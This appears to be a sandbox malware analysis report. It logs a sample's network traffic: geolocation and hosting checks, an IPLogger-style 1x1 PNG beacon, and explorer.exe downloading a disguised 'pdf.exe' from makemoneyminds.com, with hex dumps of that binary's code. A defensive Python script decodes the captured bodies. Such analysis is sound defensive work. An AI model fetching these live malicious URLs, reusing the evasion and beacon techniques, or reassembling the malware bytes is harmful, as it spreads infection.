Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 178.237.33.50 | 80 | 2004 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:36.030019999 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
May 8, 2024 16:41:36.341526985 CEST | 1139 | IN | HTTP/1.1 200 OK
date: Wed, 08 May 2024 14:41:36 GMT
server: Apache
content-length: 931
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 36 30 2e 39 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 36 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f [TRUNCATED]
Data Ascii: { "geoplugin_request":"81.181.60.92", "geoplugin_status":206, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"", "geoplugin_region":"", "geoplugin_regionCode":"", "geoplugin_regionName":"", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.1449", "geoplugin_longitude":"8.1551", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9088}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49754 | 208.95.112.1 | 80 | 5632 | C:\Users\user\AppData\Local\Temp\DE5A.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:37.173465967 CEST | 117 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.1
May 8, 2024 16:41:37.336184025 CEST | 174 | IN | HTTP/1.1 200 OK
Date: Wed, 08 May 2024 14:41:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49753 | 178.237.33.50 | 80 | 2004 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:41.289315939 CEST | 233 | IN | HTTP/1.1 408 Request Time-out
content-length: 110
cache-control: no-cache
content-type: text/html
connection: close
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.79.229 | 443 | 2120 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif

Timestamp | Bytes transferred | Direction | Data
2024-05-08 14:40:10 UTC | 58 | OUT | GET /1gFnW4 HTTP/1.1
User-Agent: Nathan
Host: 2no.co
2024-05-08 14:40:11 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Wed, 08 May 2024 14:40:11 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: close
set-cookie: 538816161370831964=3; expires=Thu, 08 May 2025 14:40:11 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: clhf03028ja=81.181.60.92; expires=Thu, 08 May 2025 14:40:11 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.42098236083984375
expires: Wed, 08 May 2024 14:40:11 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Yn0QHXfu9eAP%2FXRQZbHZGsWAqFeNEdZK34LUluSJKm19Tji0ENnRbohGUimLle49er1HHlccCFASYoKuKkUcgZ%2Bi6LW2SCr%2F8fNCqgn6jnhsuti4VoScMw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 880a34151b7708a1-SEA
alt-svc: h3=":443"; ma=86400
2024-05-08 14:40:11 UTC | 122 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-05-08 14:40:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49743 | 65.108.69.93 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-08 14:41:11 UTC | 259 | OUT | GET /YourCreditScore-ReportFileNumber-73211fcf-78f6-daeb-5650-a152fc5bfdcd-431a0807-57f0-cc80-d209-2cpdf.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: makemoneyminds.com
2024-05-08 14:41:11 UTC | 386 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Mon, 06 May 2024 09:54:24 GMT
accept-ranges: bytes
content-length: 8850847
date: Wed, 08 May 2024 14:41:11 GMT
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                2024-05-08 14:41:11 UTC982INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 f9 bf b1 91 98 d1 e2 91 98 d1 e2 91 98 d1 e2 da e0 d2 e3 99 98 d1 e2 da e0 d4 e3 2d 98 d1 e2 da e0 d5 e3 9b 98 d1 e2 91 98 d1 e2 90 98 d1 e2 97 19 2c e2 95 98 d1 e2 97 19 d4 e3 b9 98 d1 e2 97 19 d5 e3 80 98 d1 e2 97 19 d2 e3 80 98 d1 e2 da e0 d0 e3 9a 98 d1 e2 91 98 d0 e2 1f 98 d1 e2 fe 19 d5 e3 84 98 d1 e2 fe 19 d3 e3 90 98 d1 e2 52 69 63 68 91 98 d1 e2 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-,Rich
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC14994INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 53 48 83 ec 20 e8 45 f7 00 00 48 8b 18 e8 35 f7 00 00 48 8b d3 8b 08 e8 93 79 00 00 48 8b d8 e8 23 f7 00 00 48 8b d3 8b 08 48 83 c4 20 5b e9 2c 29 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 51 13 04 00 c3 cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 53 55 56 57 41 56 41 57 48 81 ec 88 00 00 00 33 c0 4d 8b f0 48 8b da 48 89 44 24 50 48 8b f9 48 89 44 24 58 48 8d 15 db b5 02 00 48 89 44 24 60 44 8d 40 58 89 44 24 28 48 8d 4c 24 20 48 89 44 24 20 49 8b f1 8b e8 e8 9a a7 00 00 44 8b f8 85 c0 74 26 48 8d 53 12 44 8b c0 48 8d 0d b5 b5 02 00 e8 50 1a 00 00 8d 45 ff 48 81 c4 88 00 00 00 41 5f 41 5e 5f 5e 5d 5b c3 b9 00
                                                                                                                                                                                                                                Data Ascii: @SH EH5HyH#HH [,)HQHT$HL$SUVWAVAWH3MHHD$PHHD$XHHD$`D@XD$(HL$ HD$ IDt&HSDHPEHA_A^_^][
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: e8 a3 75 00 00 48 8b 9c 24 a0 20 00 00 48 81 c4 80 20 00 00 5f c3 cc cc 48 83 ec 28 44 8b 05 79 b2 03 00 41 81 e8 34 01 00 00 74 5d 41 83 e8 01 74 32 41 83 e8 01 74 1c 41 83 e8 01 74 06 41 83 f8 01 75 3b 4c 8d 82 70 10 00 00 48 8d 91 10 01 00 00 eb 1b 4c 8d 82 70 10 00 00 48 8d 91 f8 00 00 00 eb 0b 4c 8d 82 70 10 00 00 48 8d 51 68 e8 f4 fa ff ff 85 c0 78 07 33 c0 48 83 c4 28 c3 b8 ff ff ff ff 48 83 c4 28 c3 4c 8d 82 70 10 00 00 48 8d 51 68 e8 cf fa ff ff 33 c9 85 c0 0f 99 c1 8d 41 ff 48 83 c4 28 c3 44 8b 05 ed b1 03 00 41 81 e8 34 01 00 00 74 44 41 83 e8 01 74 3e 41 83 e8 01 74 25 41 83 e8 01 74 0c 41 83 f8 01 74 06 b8 ff ff ff ff c3 4c 8d 82 70 40 00 00 48 8d 91 20 01 00 00 e9 7f fa ff ff 4c 8d 82 70 40 00 00 48 8d 91 08 01 00 00 e9 6c fa ff ff 4c 8d 82
                                                                                                                                                                                                                                Data Ascii: uH$ H _H(DyA4t]At2AtAtAu;LpHLpHLpHQhx3H(H(LpHQh3AH(DA4tDAt>At%AtAtLp@H Lp@HlL
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: f8 cc 00 00 4c 8b f8 48 85 c0 74 5b 8b 84 24 80 00 00 00 41 b9 ff ff ff ff 48 89 5c 24 38 4d 8b c5 48 89 5c 24 30 33 d2 89 44 24 28 b9 e9 fd 00 00 4c 89 7c 24 20 ff 15 e4 36 02 00 85 c0 74 1e 4c 89 3f ff c5 48 83 c7 08 48 ff c6 41 3b ec 7d 64 4c 8b bc 24 88 00 00 00 e9 5a ff ff ff 48 8d 15 43 63 02 00 eb 17 48 8d 15 ea 62 02 00 48 8d 0d 1b 63 02 00 eb 0e 48 8d 15 ea 62 02 00 48 8d 0d bb 62 02 00 e8 ce 9e ff ff 48 89 1f 48 85 f6 78 17 66 0f 1f 44 00 00 49 8b 0c de e8 63 cc 00 00 48 ff c3 48 3b de 7e ef 49 8b ce e8 53 cc 00 00 33 c0 eb 07 4b 89 1c e6 49 8b c6 48 8b 7c 24 48 48 8b 74 24 50 48 8b 6c 24 58 48 8b 9c 24 98 00 00 00 4c 8b 6c 24 40 48 83 c4 60 41 5f 41 5e 41 5c c3 cc cc cc cc cc 48 83 ec 28 48 8b 0d 55 84 03 00 ff 15 0f 36 02 00 48 c7 05 44 84 03
                                                                                                                                                                                                                                Data Ascii: LHt[$AH\$8MH\$03D$(L|$ 6tL?HHA;}dL$ZHCcHbHcHbHbHHxfDIcHH;~IS3KIH|$HHt$PHl$XH$Ll$@H`A_A^A\H(HU6HD
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 03 c8 81 39 50 45 00 00 75 20 b8 0b 02 00 00 66 39 41 18 75 15 83 b9 84 00 00 00 0e 76 0c 83 b9 f8 00 00 00 00 0f 95 c0 eb 02 32 c0 48 83 c4 28 c3 cc cc cc 48 8d 0d 0d 00 00 00 48 ff 25 4e f7 01 00 cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 19 48 8b f9 81 3b 63 73 6d e0 75 1c 83 7b 18 04 75 16 8b 53 20 8d 82 e0 fa 6c e6 83 f8 02 76 15 81 fa 00 40 99 01 74 0d 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 e8 4a 08 00 00 48 89 18 48 8b 5f 08 e8 52 08 00 00 48 89 18 e8 7e e6 00 00 cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8d 1d 23 f3 02 00 48 8d 3d 1c f3 02 00 eb 12 48 8b 03 48 85 c0 74 06 ff 15 14 f9 01 00 48 83 c3 08 48 3b df 72 e9 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8d 1d ef f2 02 00 48 8d 3d e8 f2 02
                                                                                                                                                                                                                                Data Ascii: 9PEu f9Auv2H(HH%NH\$WH HH;csmu{uS lv@tH\$03H _JHH_RH~H\$WH H#H=HHtHH;rH\$0H _H\$WH HH=
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 83 c4 28 c3 48 89 5c 24 08 4c 89 4c 24 20 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 48 8b 9c 24 90 00 00 00 4d 8b f0 48 8b f2 4c 8b e1 4d 85 c0 74 1a 4d 85 c9 74 15 48 85 c9 75 27 e8 0a 52 00 00 c7 00 16 00 00 00 e8 e3 ab 00 00 33 c0 48 8b 5c 24 70 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 48 85 db 74 0e 33 d2 48 83 c8 ff 49 f7 f6 4c 3b c8 76 2b 48 83 fe ff 74 12 4c 8b c6 33 d2 e8 91 aa 01 00 4c 8b 8c 24 88 00 00 00 48 85 db 74 a9 33 d2 48 83 c8 ff 49 f7 f6 4c 3b c8 77 9b 8b 43 14 90 a9 c0 04 00 00 74 05 8b 4b 20 eb 05 b9 00 10 00 00 49 8b fe 89 8c 24 90 00 00 00 49 0f af f9 4d 8b d4 4c 89 64 24 20 48 8b ef 4c 8b ee 48 85 ff 0f 84 41 01 00 00 8b 43 14 ba ff ff ff 7f 90 a9 c0 04 00 00 74 76 4c 63 7b 10 45 85 ff 74 6d 0f 88 4d 01 00 00 49 3b ef 44
                                                                                                                                                                                                                                Data Ascii: (H\$LL$ UVWATAUAVAWH0H$MHLMtMtHu'R3H\$pH0A_A^A]A\_^]Ht3HIL;v+HtL3L$Ht3HIL;wCtK I$IMLd$ HLHACtvLc{EtmMI;D
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 00 75 f7 48 8b 6c 24 70 b0 01 48 8b 74 24 78 89 53 48 48 8b 5c 24 68 48 83 c4 50 5f c3 cc cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 54 48 83 ec 50 83 49 28 10 48 8b d9 8b 41 30 41 bc df ff 00 00 85 c0 79 1c 0f b7 41 3a 66 83 e8 41 66 41 23 c4 66 f7 d8 1b c0 83 e0 f9 83 c0 0d 89 41 30 eb 1c 75 1a 66 83 79 3a 67 74 07 66 83 79 3a 47 75 0c c7 41 30 01 00 00 00 b8 01 00 00 00 4c 8b 41 08 48 8d 79 50 05 5d 01 00 00 48 8b cf 48 63 d0 e8 b2 c9 ff ff 41 b8 00 02 00 00 84 c0 75 24 48 83 bb 58 04 00 00 00 75 05 41 8b c0 eb 0a 48 8b 83 50 04 00 00 48 d1 e8 8d 90 a3 fe ff ff 89 53 30 eb 03 8b 53 30 48 8b 87 08 04 00 00 48 85 c0 48 0f 44 c7 48 89 43 40 33 c0 48 8b 4b 18 48 89 44 24 70 48 8d 41 08 48 89 43 18 4c 8b 93 58 04 00 00 f2 0f 10 01 4c 8b 5b 08 48 8b 33 0f
                                                                                                                                                                                                                                Data Ascii: uHl$pHt$xSHH\$hHP_H\$Hl$VWATHPI(HA0AyA:fAfA#fA0ufy:gtfy:GuA0LAHyP]HHcAu$HXuAHPHS0S0HHHDHC@3HKHD$pHAHCLXL[H3
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 12 00 00 48 8b d9 48 8b f9 48 3b ce 74 12 48 8b cf ff 15 d9 37 01 00 48 83 c7 48 48 3b fe 75 ee 48 8b cb e8 70 2c 00 00 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 57 48 83 ec 30 8b f1 81 f9 00 20 00 00 72 29 e8 f0 d1 ff ff bb 09 00 00 00 89 18 e8 c8 2b 00 00 8b c3 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 48 83 c4 30 41 5f c3 33 ff 8d 4f 07 e8 b6 86 00 00 90 8b df 8b 05 f5 92 02 00 48 89 5c 24 20 3b f0 7c 36 4c 8d 3d e5 8e 02 00 49 39 3c df 74 02 eb 22 e8 90 fe ff ff 49 89 04 df 48 85 c0 75 05 8d 78 0c eb 14 8b 05 c4 92 02 00 83 c0 40 89 05 bb 92 02 00 48 ff c3 eb c1 b9 07 00 00 00 e8 c4 86 00 00 8b c7 eb 8a 48 63 d1 4c 8d 05 9e 8e 02 00 48 8b c2 83 e2 3f 48 c1 f8 06 48 8d 0c d2 49 8b 04 c0 48 8d 0c
                                                                                                                                                                                                                                Data Ascii: HHH;tH7HHH;uHp,H\$0Ht$8H _H\$Ht$H|$AWH0 r)+H\$@Ht$HH|$PH0A_3OH\$ ;|6L=I9<t"IHux@HHcLH?HHIH
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 54 24 30 ff 15 bf f8 00 00 85 c0 74 59 80 bc 24 a0 00 00 00 02 75 54 48 8b 4c 24 38 4c 8d 8c 24 b8 00 00 00 d1 ed 49 8b d7 44 8b c5 48 89 74 24 20 ff 15 99 f8 00 00 85 c0 75 1f ff 15 ff f5 00 00 8b c8 e8 78 91 ff ff 83 cf ff 48 8b cb e8 45 ec ff ff 8b c7 e9 7f 01 00 00 8b 84 24 b8 00 00 00 8d 3c 47 eb 40 40 88 74 24 48 48 8b 4c 24 38 4c 8d 8c 24 b8 00 00 00 44 8b c5 48 89 74 24 20 49 8b d7 ff 15 0f f8 00 00 85 c0 0f 84 f4 00 00 00 44 39 a4 24 b8 00 00 00 0f 87 e6 00 00 00 03 bc 24 b8 00 00 00 48 8b 54 24 40 4c 8d 1d d6 4e 02 00 49 8b 04 d3 42 38 74 f0 38 7d 8e 80 bc 24 a0 00 00 00 02 4c 63 c7 74 25 4c 8b 8c 24 a8 00 00 00 49 8b c4 48 d1 e8 49 8b d7 41 8b cd 48 89 44 24 20 e8 d4 f8 ff ff 8b f8 e9 5c ff ff ff 49 d1 e8 40 38 74 24 48 74 7a 4c 8b 54 24 50 49
                                                                                                                                                                                                                                Data Ascii: T$0tY$uTHL$8L$IDHt$ uxHE$<G@@t$HHL$8L$DHt$ ID9$$HT$@LNIB8t8}$Lct%L$IHIAHD$ \I@8t$HtzLT$PI
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC408INData Raw: cb 84 c0 75 d8 eb 06 45 88 11 4c 8b cb 49 3b db 4c 89 0f 4d 0f 45 d3 49 8b c2 48 8b 4c 24 40 48 33 cc e8 81 b5 fe ff 48 83 c4 50 5f 5e 5b c3 e8 a8 b6 fe ff cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 33 c0 4c 8b c2 48 89 01 48 8b d9 89 41 08 41 be 20 00 00 00 8b 05 d9 0e 02 00 89 41 04 0f b7 02 eb 08 49 83 c0 02 41 0f b7 00 66 41 3b c6 74 f2 66 83 f8 61 74 21 66 83 f8 72 74 12 66 83 f8 77 0f 85 75 02 00 00 c7 01 01 03 00 00 eb 0f c7 41 04 01 00 00 00 eb 0d c7 01 09 01 00 00 c7 41 04 02 00 00 00 49 83 c0 02 b2 01 33 ed 44 8a cd 40 8a fd 44 8a d5 44 8a dd 8d 75 0a 66 41 39 28 0f 84 48 01 00 00 41 0f b7 08 83 f9 53 0f 87 a5 00 00 00 0f 84 88 00 00 00 41 2b ce 0f 84 17 01 00 00 83 e9 0b 74 48 83 e9 01 74 3b 83 e9 18
                                                                                                                                                                                                                                Data Ascii: uELI;LMEIHL$@H3HP_^[HHXHhHpHx AVH 3LHHAA AIAfA;tfat!frtfwuAAI3D@DDufA9(HASA+tHt;
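Two things in the captured traffic are worth pulling out of the hex by hand: the Cloudflare-fronted session ends with a chunked response whose entire body is a 1x1 PNG (a check-in or tracking beacon, not content), and the injected explorer.exe then fetches a "...pdf.exe" double-extension file served as application/x-msdownload, of which the report shows only the first bytes (the DOS header and stub). The script below is an added example, not part of the Joe Sandbox report: it rebuilds the wire bytes from the report's "Data Raw:" rows (copied verbatim for the PNG session; the PE prefix is the report's DOS header laid out field by field), decodes the chunked body, and identifies what was served, treating the truncated capture as the normal case rather than assuming the PE signature is reachable. The FULL_HEADER_SAMPLE constant is constructed, not from the report.

```python
"""Decode the HTTP bodies captured in the report and identify what was served."""
import re
import struct

# Rows copied from the report's "Data Raw:" dump of the Cloudflare-fronted session:
# a 0x74-byte chunk carrying a PNG, then the terminating zero-size chunk.
PNG_CHUNKED_ROWS = [
    "Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 "
    "00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da "
    "00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e "
    "c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 "
    "00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a",
    "Data Raw: 30 0d 0a 0d 0a",
]

# DOS header (64 bytes) and stub of the PE served by makemoneyminds.com, as captured in the
# report. e_lfanew (offset 0x3c) is 0x110, beyond the captured prefix, so the PE signature
# cannot be verified from the report alone.
PE_PREFIX = (
    bytes.fromhex("4d5a90000300000004000000ffff0000b8000000000000004000000000000000")
    + bytes(28)
    + bytes.fromhex("10010000")
    + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.\r\r\n$\x00"
)

# Constructed, not from the report: a minimal header whose PE signature IS inside the data,
# to exercise the non-truncated path (e_lfanew = 0x40, Machine = 0x8664 / x64).
FULL_HEADER_SAMPLE = (
    b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0" + struct.pack("<H", 0x8664)
)


def hex_rows_to_bytes(rows):
    """Turn the report's 'Data Raw: xx xx ...' rows back into the bytes on the wire."""
    out = bytearray()
    for row in rows:
        hex_part = row.split("Data Raw:", 1)[-1]
        out += bytes.fromhex("".join(re.findall(r"\b[0-9a-fA-F]{2}\b", hex_part)))
    return bytes(out)


def decode_chunked(raw):
    """Decode an HTTP/1.1 chunked body: hex size line, data, CRLF, until a zero-size chunk."""
    body = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(raw[pos:eol].split(b";")[0].strip(), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(body)  # trailers, if any, are ignored
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        body += chunk
        pos += size + 2


def identify_payload(data):
    """Sniff a response body: PNG (with IHDR dimensions) or PE (with e_lfanew / Machine)."""
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        if len(data) < 26 or data[12:16] != b"IHDR":
            return {"type": "png", "ihdr_captured": False}
        width, height = struct.unpack_from(">II", data, 16)
        return {"type": "png", "width": width, "height": height,
                "bit_depth": data[24], "color_type": data[25]}
    if data[:2] == b"MZ":
        info = {"type": "pe", "pe_header_captured": False}
        if len(data) < 0x40:
            return info
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        info["e_lfanew"] = e_lfanew
        # Only claim a PE header when the signature and Machine field are really in the capture.
        if len(data) >= e_lfanew + 6 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            info["pe_header_captured"] = True
            info["machine"] = struct.unpack_from("<H", data, e_lfanew + 4)[0]
        return info
    return {"type": "unknown", "magic": data[:4].hex()}


if __name__ == "__main__":
    beacon = decode_chunked(hex_rows_to_bytes(PNG_CHUNKED_ROWS))
    print(len(beacon), identify_payload(beacon))       # 116 {'type': 'png', 'width': 1, 'height': 1, ...}
    print(identify_payload(PE_PREFIX))                 # {'type': 'pe', 'pe_header_captured': False, 'e_lfanew': 272}
    print(identify_payload(FULL_HEADER_SAMPLE))        # {'type': 'pe', 'pe_header_captured': True, ..., 'machine': 34404}
```

The "pe_header_captured" flag matters when triaging sandbox reports: the dump proves an MZ header was served under a PDF-looking name from explorer.exe, but the architecture and subsystem have to come from the dropped file itself, not from the 982-byte capture.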



                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:16:40:03
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Og1SeeXcB2.exe
